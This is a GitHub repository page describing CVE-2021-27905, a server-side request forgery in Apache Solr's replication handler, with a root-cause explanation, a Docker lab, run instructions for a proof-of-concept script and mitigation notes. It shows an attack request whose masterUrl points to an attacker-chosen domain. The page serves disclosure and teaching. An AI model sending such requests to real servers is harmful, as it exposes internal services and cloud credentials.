Skip to content

RIZZZIOM/CVE-2021-27905

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
attachments
attachments
 
 
lab
lab
 
 
README.md
README.md
 
 
cve-2021-27905.py
cve-2021-27905.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2021-27905

Sr No Title
1 Overview
2 Root Cause
3 Proof Of Concept
4 Mitigation (8.8.2+)
5 Reference

For educational and research purposes only. Do not use this code on systems you do not own or have explicit permission to test. I am not responsible for any misuse.

Overview

This is a Server Side Request Forgery vulnerability affecting Apache Solr (< 8.8.2) that allows remote attackers to make arbitrary HTTP requests to internal or external systems through the replication handler's masterUrl parameter, potentially exposing internal services or sensitive cloud metadata.

Affected Versions : All versions prior to 8.8.2 (7.0.0 - 7.7.3, 8.0.0 - 8.8.1)

Root Cause

The replication mechanism in Solr lets a "replica" fetch index files from a "master/leader" by specifying a masterUrl or leaderUrl parameter. The URL pointed through this parameter isn't properly validated in the affected Apache Solr versions. So, it would allow attackers to convince the server to a remote resource that they choose.

Vulnerable Flow

  • An attacker would send a request to an endpoint such as:
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>

Solr's ReplicationHandler would:

  1. Accept the request.
  2. Use the provided masterUrl to download index data.
  3. Internally make an HTTP call to that address.

Proof Of Concept

LAB SETUP

  • A lab can be setup locally using docker:
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
  • Cleanup
$ docker compose down

EXPLOITATION

  • Setup a virtual environment:
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/scripts/activate
  • Install requirements:
$ pip install -r requirements.txt
  • Run cve-2021-27905.py
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>

SSRF PoC

Mitigation (8.8.2+)

Solr ReplicationHandler was patched to:

  • Validate that masterUrl/leaderUrl points only to approved hosts.
  • Restrict acceptable URL schemes (http, https only ).
  • Harden remote streaming features.
  • Recommend admins to secure /replication with auth or remove it entirely if unused.

Reference

About

Apache Solr < 8.8.2 Server Side Request Forgery

ziomsec.com/blog/cve-2021-27905/

Topics

poc apache-solr ssrf blind-ssrf cve-2021-27905

Resources

Readme
Activity

Stars

2 stars

Watchers

0 watching

Forks

0 forks
Report repository

Languages